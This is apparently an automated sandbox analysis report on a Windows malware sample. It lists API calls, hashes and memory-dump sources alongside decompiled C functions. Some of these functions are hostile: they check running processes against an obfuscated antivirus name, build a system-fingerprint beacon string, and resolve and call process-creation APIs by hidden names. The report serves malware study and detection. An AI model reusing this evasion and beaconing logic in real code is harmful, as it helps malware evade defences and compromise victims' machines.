                                                                                                            • Opcode ID: 9131a6f8e2f701eef9399ed5c66e0ce2d06d9580d8301257b32263d056906b99
                                                                                                            • Instruction ID: b7354929ca658a7b6173a53b81df9eb55fd141441519fe8df60f730220d5bf58
                                                                                                            • Opcode Fuzzy Hash: 9131a6f8e2f701eef9399ed5c66e0ce2d06d9580d8301257b32263d056906b99
                                                                                                            • Instruction Fuzzy Hash: 5881A674A07244EFC790FBB6CDC4DAFB7EEEB9A6007294D65A001DF108EA35D9448B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            • Opcode ID: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction ID: b9038b26e503fdf3372fd5dba6b1beb4a290d0c80aad08930d05b0c569eee49d
                                                                                                            • Opcode Fuzzy Hash: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction Fuzzy Hash: FC21B322A04205A6E7248BA8C901B8B77F7FF45B64B569525EA1DDB241F732ED40E3B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E163
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E18E
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E222
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E230
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6F09E2F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4147378913-0
                                                                                                            • Opcode ID: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction ID: 7d94eda82526b67a6a9a647f4f0cb3aedd7e4f5a96d6fa77c282a6fd0cf40f51
                                                                                                            • Opcode Fuzzy Hash: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction Fuzzy Hash: DC71FF71A04706AAEB15AB74CC45FAA73E8FF45714F00642AEA19DB1C0FB74ED40A7B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            • Opcode ID: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction ID: f7c5c2cede04a5099c9d5b96f66da20424d4ed8fbe69b65b7d2ef50b0a75e124
                                                                                                            • Opcode Fuzzy Hash: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction Fuzzy Hash: 5F515A71A0060AEAEF00DFA5CC44BAFB7B8BF09305F04556AE925E7191F770A940AB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E03034A03() {
                                                                                                            				char _v264;
                                                                                                            				void* _v300;
                                                                                                            				int _t8;
                                                                                                            				intOrPtr _t9;
                                                                                                            				int _t15;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t15 = 0;
                                                                                                            				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                            				if(_t17 != 0) {
                                                                                                            					_t8 = Process32First(_t17,  &_v300);
                                                                                                            					while(_t8 != 0) {
                                                                                                            						_t9 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t2 = _t9 + 0x303ee3c; // 0x73617661
                                                                                                            						_push( &_v264);
                                                                                                            						if( *0x303d110() != 0) {
                                                                                                            							_t15 = 1;
                                                                                                            						} else {
                                                                                                            							_t8 = Process32Next(_t17,  &_v300);
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						L7:
                                                                                                            						CloseHandle(_t17);
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				L8:
                                                                                                            				return _t15;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03034A13
                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 03034A26
                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 03034A52
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 03034A61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 420147892-0
                                                                                                            • Opcode ID: 22908542aab9c5cd8d56f44817a1bfe905b159750c951cf3fd5831b482759219
                                                                                                            • Instruction ID: 603632de1550618bb8923e09195a376aa1dbba93f68d3558a8f7bdf11fd7a0bd
                                                                                                            • Opcode Fuzzy Hash: 22908542aab9c5cd8d56f44817a1bfe905b159750c951cf3fd5831b482759219
                                                                                                            • Instruction Fuzzy Hash: E1F02B3610362467D720F627DC0AEDB33ACDFC7310F0405A2E515D7000EA38CA55C7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E03036109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                            				void* _v8;
                                                                                                            				signed int _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				void* _v24;
                                                                                                            				void* _v28;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				long _t59;
                                                                                                            				intOrPtr _t60;
                                                                                                            				intOrPtr _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr _t63;
                                                                                                            				intOrPtr _t64;
                                                                                                            				void* _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				int _t71;
                                                                                                            				void* _t72;
                                                                                                            				void* _t73;
                                                                                                            				void* _t75;
                                                                                                            				void* _t78;
                                                                                                            				intOrPtr _t82;
                                                                                                            				intOrPtr _t86;
                                                                                                            				intOrPtr* _t88;
                                                                                                            				void* _t94;
                                                                                                            				intOrPtr _t100;
                                                                                                            				signed int _t104;
                                                                                                            				char** _t106;
                                                                                                            				int _t109;
                                                                                                            				intOrPtr* _t112;
                                                                                                            				intOrPtr* _t114;
                                                                                                            				intOrPtr* _t116;
                                                                                                            				intOrPtr* _t118;
                                                                                                            				intOrPtr _t121;
                                                                                                            				intOrPtr _t126;
                                                                                                            				int _t130;
                                                                                                            				CHAR* _t132;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t134;
                                                                                                            				void* _t143;
                                                                                                            				int _t144;
                                                                                                            				void* _t145;
                                                                                                            				intOrPtr _t146;
                                                                                                            				void* _t148;
                                                                                                            				long _t152;
                                                                                                            				intOrPtr* _t153;
                                                                                                            				intOrPtr* _t154;
                                                                                                            				intOrPtr* _t157;
                                                                                                            				void* _t158;
                                                                                                            				void* _t160;
                                                                                                            
                                                                                                            				_t143 = __edx;
                                                                                                            				_t134 = __ecx;
                                                                                                            				_t59 = __eax;
                                                                                                            				_v12 = 8;
                                                                                                            				if(__eax == 0) {
                                                                                                            					_t59 = GetTickCount();
                                                                                                            				}
                                                                                                            				_t60 =  *0x303d018; // 0x3dd6b064
                                                                                                            				asm("bswap eax");
                                                                                                            				_t61 =  *0x303d014; // 0x3a87c8cd
                                                                                                            				_t132 = _a16;
                                                                                                            				asm("bswap eax");
                                                                                                            				_t62 =  *0x303d010; // 0xd8d2f808
                                                                                                            				asm("bswap eax");
                                                                                                            				_t63 =  *0x303d00c; // 0x13d015ef
                                                                                                            				asm("bswap eax");
                                                                                                            				_t64 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t3 = _t64 + 0x303e633; // 0x74666f73
                                                                                                            				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x303d02c,  *0x303d004, _t59);
                                                                                                            				_t67 = E03035B60();
                                                                                                            				_t68 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t4 = _t68 + 0x303e673; // 0x74707526
                                                                                                            				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                            				_t160 = _t158 + 0x38;
                                                                                                            				_t145 = _t144 + _t71;
                                                                                                            				_t72 = E03031BBF(_t134);
                                                                                                            				_t133 = __imp__; // 0x74785520
                                                                                                            				_v8 = _t72;
                                                                                                            				if(_t72 != 0) {
                                                                                                            					_t126 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t7 = _t126 + 0x303e8cc; // 0x736e6426
                                                                                                            					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                            					_t160 = _t160 + 0xc;
                                                                                                            					_t145 = _t145 + _t130;
                                                                                                            					HeapFree( *0x303d270, 0, _v8);
                                                                                                            				}
                                                                                                            				_t73 = E0303137A();
                                                                                                            				_v8 = _t73;
                                                                                                            				if(_t73 != 0) {
                                                                                                            					_t121 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t11 = _t121 + 0x303e8d4; // 0x6f687726
                                                                                                            					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                            					_t160 = _t160 + 0xc;
                                                                                                            					HeapFree( *0x303d270, 0, _v8);
                                                                                                            				}
                                                                                                            				_t146 =  *0x303d364; // 0x53195b0
                                                                                                            				_t75 = E03033857(0x303d00a, _t146 + 4);
                                                                                                            				_t152 = 0;
                                                                                                            				_v20 = _t75;
                                                                                                            				if(_t75 == 0) {
                                                                                                            					L26:
                                                                                                            					HeapFree( *0x303d270, _t152, _a16);
                                                                                                            					return _v12;
                                                                                                            				} else {
                                                                                                            					_t78 = RtlAllocateHeap( *0x303d270, 0, 0x800);
                                                                                                            					_v8 = _t78;
                                                                                                            					if(_t78 == 0) {
                                                                                                            						L25:
                                                                                                            						HeapFree( *0x303d270, _t152, _v20);
                                                                                                            						goto L26;
                                                                                                            					}
                                                                                                            					E0303A811(GetTickCount());
                                                                                                            					_t82 =  *0x303d364; // 0x53195b0
                                                                                                            					__imp__(_t82 + 0x40);
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					_t86 =  *0x303d364; // 0x53195b0
                                                                                                            					__imp__(_t86 + 0x40);
                                                                                                            					_t88 =  *0x303d364; // 0x53195b0
                                                                                                            					_t148 = E03031974(1, _t143, _a16,  *_t88);
                                                                                                            					_v28 = _t148;
                                                                                                            					asm("lock xadd [eax], ecx");
                                                                                                            					if(_t148 == 0) {
                                                                                                            						L24:
                                                                                                            						HeapFree( *0x303d270, _t152, _v8);
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					StrTrimA(_t148, 0x303c2ac);
                                                                                                            					_push(_t148);
                                                                                                            					_t94 = E030338CA();
                                                                                                            					_v16 = _t94;
                                                                                                            					if(_t94 == 0) {
                                                                                                            						L23:
                                                                                                            						HeapFree( *0x303d270, _t152, _t148);
                                                                                                            						goto L24;
                                                                                                            					}
                                                                                                            					_t153 = __imp__;
                                                                                                            					 *_t153(_t148, _a4);
                                                                                                            					 *_t153(_v8, _v20);
                                                                                                            					_t154 = __imp__;
                                                                                                            					 *_t154(_v8, _v16);
                                                                                                            					_t100 = E03031922( *_t154(_v8, _t148), _v8);
                                                                                                            					_a4 = _t100;
                                                                                                            					if(_t100 == 0) {
                                                                                                            						_v12 = 8;
                                                                                                            						L21:
                                                                                                            						E030347D5();
                                                                                                            						L22:
                                                                                                            						HeapFree( *0x303d270, 0, _v16);
                                                                                                            						_t152 = 0;
                                                                                                            						goto L23;
                                                                                                            					}
                                                                                                            					_t104 = E0303365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                            					_v12 = _t104;
                                                                                                            					if(_t104 == 0) {
                                                                                                            						_t157 = _v24;
                                                                                                            						_v12 = E03033273(_t157, _a4, _a8, _a12);
                                                                                                            						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                            						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                            						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                            						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                            						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                            						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                            						_t118 =  *_t157;
                                                                                                            						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                            						E03034AAB(_t157);
                                                                                                            					}
                                                                                                            					if(_v12 != 0x10d2) {
                                                                                                            						L16:
                                                                                                            						if(_v12 == 0) {
                                                                                                            							_t106 = _a8;
                                                                                                            							if(_t106 != 0) {
                                                                                                            								_t149 =  *_t106;
                                                                                                            								_t155 =  *_a12;
                                                                                                            								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                            								_t109 = E03038FB2(_t149, _t149, _t155 >> 1);
                                                                                                            								_t148 = _v28;
                                                                                                            								 *_a12 = _t109;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L19;
                                                                                                            					} else {
                                                                                                            						if(_a8 != 0) {
                                                                                                            							L19:
                                                                                                            							E03034AAB(_a4);
                                                                                                            							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                            								goto L22;
                                                                                                            							} else {
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = _v12 & 0x00000000;
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 0303611D
                                                                                                            • wsprintfA.USER32 ref: 0303616D
                                                                                                            • wsprintfA.USER32 ref: 0303618A
                                                                                                            • wsprintfA.USER32 ref: 030361B6
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030361C8
                                                                                                            • wsprintfA.USER32 ref: 030361E9
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030361F9
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03036227
                                                                                                            • GetTickCount.KERNEL32 ref: 03036238
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 0303624C
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 0303626A
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 03031974: strcpy.NTDLL ref: 030319BE
                                                                                                              • Part of subcall function 03031974: lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03031974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                            • StrTrimA.SHLWAPI(00000000,0303C2AC,?,053195B0), ref: 030362A1
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030338CA: lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                              • Part of subcall function 030338CA: lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 030362C2
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 030362CA
                                                                                                            • lstrcat.KERNEL32(?,?), ref: 030362D8
                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 030362DE
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • wcstombs.NTDLL ref: 0303636F
                                                                                                              • Part of subcall function 03033273: SysAllocString.OLEAUT32(?), ref: 030332AE
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 030363B0
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 030363BC
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,053195B0), ref: 030363C8
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030363D4
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030363E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3748877296-1536154274
                                                                                                            • Opcode ID: 39934ed942171c7913de6ffc4a4461317df936df59441dfdbf76bac9e044c574
                                                                                                            • Instruction ID: 25f7963e2d8f74c7059e7d09d590f40b964accd4e910700e050f210a20ca1b18
                                                                                                            • Opcode Fuzzy Hash: 39934ed942171c7913de6ffc4a4461317df936df59441dfdbf76bac9e044c574
                                                                                                            • Instruction Fuzzy Hash: 9C914775902208BFDB11EFA8DC88AAEBBBDFF4A350B144065F404E7250DB35D911DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 1918051841-0
                                                                                                            • Opcode ID: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction ID: b88f8a9b62268b91310e837935197862e9c1f3f2e6417438e6ac06688119bf8d
                                                                                                            • Opcode Fuzzy Hash: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction Fuzzy Hash: 3D91F670E05325AAEB246BB58E41B7F7AE9DF47754F10452DF808AF2C1EB748D1087A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction ID: 3f9fa70ca20f02cb9c3e7a39182d44f9e0c1c8e6995c2c591b584dee4214acfc
                                                                                                            • Opcode Fuzzy Hash: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction Fuzzy Hash: 693139B16047019FEB118B39DA40BDA73E9AF04324F54A42AE465DB191EF30FA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 73%
                                                                                                            			E03031000(void* __eax, void* __ecx) {
                                                                                                            				long _v8;
                                                                                                            				char _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v28;
                                                                                                            				long _v32;
                                                                                                            				void _v104;
                                                                                                            				char _v108;
                                                                                                            				long _t36;
                                                                                                            				intOrPtr _t40;
                                                                                                            				intOrPtr _t47;
                                                                                                            				intOrPtr _t50;
                                                                                                            				void* _t58;
                                                                                                            				void* _t68;
                                                                                                            				intOrPtr* _t70;
                                                                                                            				intOrPtr* _t71;
                                                                                                            
                                                                                                            				_t1 = __eax + 0x14; // 0x74183966
                                                                                                            				_t69 =  *_t1;
                                                                                                            				_t36 = E03034837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                            				_v8 = _t36;
                                                                                                            				if(_t36 != 0) {
                                                                                                            					L12:
                                                                                                            					return _v8;
                                                                                                            				}
                                                                                                            				E0303A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                            				_t40 = _v12(_v12);
                                                                                                            				_v8 = _t40;
                                                                                                            				if(_t40 == 0 && ( *0x303d298 & 0x00000001) != 0) {
                                                                                                            					_v32 = 0;
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					_v108 = 0;
                                                                                                            					memset( &_v104, 0, 0x40);
                                                                                                            					_t47 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t18 = _t47 + 0x303e3b3; // 0x73797325
                                                                                                            					_t68 = E03032291(_t18);
                                                                                                            					if(_t68 == 0) {
                                                                                                            						_v8 = 8;
                                                                                                            					} else {
                                                                                                            						_t50 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t19 = _t50 + 0x303e760; // 0x5318d08
                                                                                                            						_t20 = _t50 + 0x303e0af; // 0x4e52454b
                                                                                                            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                            						if(_t71 == 0) {
                                                                                                            							_v8 = 0x7f;
                                                                                                            						} else {
                                                                                                            							_v108 = 0x44;
                                                                                                            							E030334C7();
                                                                                                            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                            							_push(1);
                                                                                                            							E030334C7();
                                                                                                            							if(_t58 == 0) {
                                                                                                            								_v8 = GetLastError();
                                                                                                            							} else {
                                                                                                            								CloseHandle(_v28);
                                                                                                            								CloseHandle(_v32);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						HeapFree( *0x303d270, 0, _t68);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t70 = _v16;
                                                                                                            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                            				E03034AAB(_t70);
                                                                                                            				goto L12;
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 03034837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0303101C,?,00000001,?,?,00000000,00000000), ref: 0303485C
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0303487E
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03034894
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 030348AA
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 030348C0
                                                                                                              • Part of subcall function 03034837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 030348D6
                                                                                                            • memset.NTDLL ref: 0303106A
                                                                                                              • Part of subcall function 03032291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03031083,73797325), ref: 030322A2
                                                                                                              • Part of subcall function 03032291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 030322BC
                                                                                                            • GetModuleHandleA.KERNEL32(4E52454B,05318D08,73797325), ref: 030310A0
